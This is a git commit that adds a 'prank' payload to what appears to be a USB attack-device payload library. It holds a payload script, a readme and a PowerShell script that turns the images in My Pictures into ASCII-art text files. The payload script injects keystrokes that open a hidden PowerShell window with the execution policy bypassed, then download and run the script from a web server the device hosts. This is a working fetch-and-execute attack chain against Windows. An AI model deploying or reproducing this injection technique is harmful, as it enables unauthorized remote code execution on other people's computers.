New Payload - My Pictures 2 Ascii Art (#531)

* New Payload - MyPicture2AsciiArt * New Payload - MyPicture2AsciiArt * Fix Title
2022-06-09 18:38:05 +01:00 · 2022-06-09 18:38:05 +01:00 · 63fe005ddc
parent 56a74583a4
commit 63fe005ddc
3 changed files with 132 additions and 0 deletions
--- a/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/payload.txt
+++ b/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/payload.txt
@ -0,0 +1,33 @@
+#!/bin/bash
+# Title:          My Pictures 2 Ascii Art
+# Description:    Converts Jpeg, Png & BMP's in the My Pictures to ascii art versions.
+# Author:         Cribbit
+# Version:        1.0
+# Category:       General
+# Target:         Windows (Powershell 5.1+)
+# Attackmodes:    RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 200
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
--- a/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/readme.md
+++ b/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/readme.md
@ -0,0 +1,23 @@
+# My Pictures 2 Ascii Art
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+- Props: Thinathayalan Ganesan & I am Jakoby
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Converts JPEG, PNG & BMP's in the My Pictures to ascii art versions.
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished          |
--- a/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/s
+++ b/payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/s
@ -0,0 +1,76 @@
+[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing");
+
+$AsciiChars = @( 'M', '#', '@', '%', 'X', '=', '+', '*', ';', ':', '-', '.', ' ' )
+
+Function PS-AsciiArt
+{
+    [CmdletBinding()]
+    param(
+            [String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, [Switch] $Reverse
+    )
+    process
+    {
+        foreach($item in $Path)
+        {
+            if ($Reverse -eq $true)
+            {
+               [array]::Reverse($AsciiChars)
+            }
+			$sb = [System.Text.StringBuilder]::new()
+            # Convert path to BitMap     
+            $name = (Get-Item $Item).fullname;       
+            $Bitmap = [System.Drawing.Bitmap]::FromFile($name)
+            # Resize Image
+            $Bitmap = (Get-ReSizedImage $BitMap 100)
+            # draw every other line
+            $draw = $true;
+            # loop down the image
+            foreach($y in (0..($BitMap.Height-1)))
+            {                
+                if ($draw)
+                {
+                    foreach($x in (0..($BitMap.Width-1)))
+                    {
+                        # get pixal
+                        $Pixel = $Bitmap.GetPixel($X,$Y)
+
+                        $Grey = ($Pixel.R + $Pixel.G + $Pixel.B) / 3;  
+                        $grayColor = [System.Drawing.Color]::FromArgb($Grey,$Grey,$Grey);                           
+                        if (!$toggle)
+                        {
+                            $index = (($grayColor.R * ($AsciiChars.count-1)) / 255);                           
+                            [void]$sb.Append($AsciiChars[$index]);
+                        }
+                    }
+                    [void]$sb.AppendLine('') #Start the next row
+                }
+                # flip bool
+                $draw = !$draw;
+            }
+			$sb.ToString() | Out-File ([io.path]::ChangeExtension($name, "ascii.txt"))
+        }
+    }
+}
+
+Function Get-ReSizedImage
+{
+    param(
+            [System.Drawing.Bitmap] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Image, [int] [parameter(mandatory=$true)] $Width
+    )
+    Process
+    {     
+        $asciiHeight=0;
+        #Calculate the new Height of the image from its width
+        $asciiHeight = [int][Math]::Ceiling([double]$Image.Height * $Width / $Image.Width);
+        #Create a new Bitmap and define its resolution
+        $result = New-Object System.Drawing.Bitmap($Width, $asciiHeight);
+        $g = [System.Drawing.Graphics]::FromImage([System.Drawing.Image]$result);
+        #The interpolation mode produces high quality images
+        $g.InterpolationMode = [System.Drawing.Drawing2D.InterpolationMode]::HighQualityBicubic;
+        $g.DrawImage($Image, 0, 0, $Width, $asciiHeight);
+        $g.Dispose();
+        return $result;  
+    }
+}
+
+Get-ChildItem ([environment]::getfolderpath("MyPictures")) | ? {$_.extension -in ".jpg", ".jpeg", ".png", ".bmp"} |% {$_.FullName | PS-AsciiArt}